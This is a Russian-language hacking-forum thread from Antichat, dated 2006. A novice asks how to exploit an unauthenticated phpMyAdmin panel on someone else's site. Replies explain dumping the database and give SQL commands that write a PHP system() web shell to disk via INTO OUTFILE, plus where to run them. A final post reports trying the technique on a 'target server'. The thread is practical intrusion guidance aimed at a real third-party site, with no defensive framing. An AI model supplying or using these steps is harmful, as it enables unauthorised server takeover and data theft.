Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Как залить шелл через PhpMyAdmin? |

15.02.2006, 01:01
|
|
Познающий
Регистрация: 29.07.2005
Сообщений: 69
Провел на форуме: 177573
Репутация:
2
|
|
Как залить шелл через PhpMyAdmin?
не знал куда писать но напигу сюда.
кароче есть форум на сайте ну это фигня там другая фигня.. например:я пишу http://xxx.xxx.ru/admin/ он мне сразу зашол
[Добро пожаловать в phpMyAdmin 2.4.0
MySQL 4.1.11 на localhost как xxx@localhost] не попросил не каких паролей не чо как нибудь можно скачать БД ? 
|
|
|

15.02.2006, 01:12
|
|
Новичок
Регистрация: 14.02.2006
Сообщений: 2
Провел на форуме: 29543
Репутация:
0
|
|
Да, можно 
|
|
|

15.02.2006, 01:21
|
|
Участник форума
Регистрация: 17.07.2004
Сообщений: 181
Провел на форуме: 560754
Репутация:
97
|
|
ну это воще странно что тебя теда впустили без пасов.. повезло)
естественно имея доступ к pma можешь делать с базой что угодно редактировать таблицы и естествеено сделать дамп нужной базы.еще можно попробовать залить шел если прав хватит .
слева выбирааешь нужные базы и днлаешь дамп (экспорт).
|
|
|

15.02.2006, 07:03
|
|
Banned
Регистрация: 15.12.2005
Сообщений: 95
Провел на форуме: 1509352
Репутация:
132
|
|
Сообщение от Grrl
ну это воще странно что тебя теда впустили без пасов.. повезло)
естественно имея доступ к pma можешь делать с базой что угодно редактировать таблицы и естествеено сделать дамп нужной базы.еще можно попробовать залить шел если прав хватит .
слева выбирааешь нужные базы и днлаешь дамп (экспорт).
Прости, быть может не правильно понял смысл... через МиСКЛю можно лить шеллы? как? 
|
|
|

15.02.2006, 12:00
|
|
Познавший АНТИЧАТ
Регистрация: 18.06.2005
Сообщений: 1,004
Провел на форуме: 2821162
Репутация:
1320
|
|
Прости, быть может не правильно понял смысл... через МиСКЛю можно лить шеллы? как?
Если ничего не путаю, то надо сделать дамп базы, изменить несколько (или даже одну) строк и залить обратно.
Если правильно понял твой вопрос.
|
|
|

15.02.2006, 19:17
|
|
Познающий
Регистрация: 29.07.2005
Сообщений: 69
Провел на форуме: 177573
Репутация:
2
|
|
блин я в этом phpAdmine не Шарю как там куда захадить то надо ?? там кароче с лева написано
БД отсутствуют и есть MySQL Создать новую БД и всякой разной Хрени как залить шел ?? поясните Ньюбу 
|
|
|

15.02.2006, 21:35
|
|
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме: 621131
Репутация:
47
|
|
2qPhoenix, Buga выполняем эти команды:
UPDATE table SET column='<? system("$cmd"); ?>' WHERE id='0';
SELECT name FROM table WHERE id='0' INTO OUTFILE '/path/to/file/shell.php';
UPDATE table SET column='nothing' WHERE id='0';
Шелл будет в /path/to/file/shell.php
|
|
|

15.02.2006, 21:42
|
|
Познающий
Регистрация: 29.07.2005
Сообщений: 69
Провел на форуме: 177573
Репутация:
2
|
|
апять я запутался я же навичок.
где и как их выполнить ? 
|
|
|

16.02.2006, 02:31
|
|
Участник форума
Регистрация: 17.07.2004
Сообщений: 181
Провел на форуме: 560754
Репутация:
97
|
|
где выполнять? ну даешь... там в майадмине есть такая ссылка вверху "SQL"
жмешь ее потом откроется форма в ней пишешь sql запрос и внизу жмешь кнопку "пошел" или "submit" или чо там у теебя..
Последний раз редактировалось Grrl; 16.02.2006 в 02:33..
|
|
|

16.02.2006, 10:27
|
|
Banned
Регистрация: 15.12.2005
Сообщений: 95
Провел на форуме: 1509352
Репутация:
132
|
|
WinXP, MySQL 4.1.18-nt, таблица 'lol' c текстовым столбцом 'txt', работаю MySQL Query Browser 1.1.20, админки нет (на целевом)
Пасяб virgoz за идею, правда всего так и не понял =)
Приступим:
Загоняем шелл в таблу: LOAD DATA INFILE 'e:/shell/nst.php' INTO TABLE lol; гуд! 2103 строк записано...
Вынимаем на локалхост: SELECT * FROM lol INTO OUTFILE 'd:/http/shell.php'; гуд! 2103 строк записано...
Запускаю - белый экран, исходный код - пусто...
Сравниваю шеллы:
Исходник - 82*940 байт/2103 строк
Созданый - 82*547 байт/2156 строк
пробую прогнать сие еще 3-4 раза и впадаю в отчаяние...
Плз, втолкуйте в чем ошибка, и желательно поскорее, бо на целевом серваке я тож пару раз проверил... 
Последний раз редактировалось qPhoenix; 16.02.2006 в 10:30..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|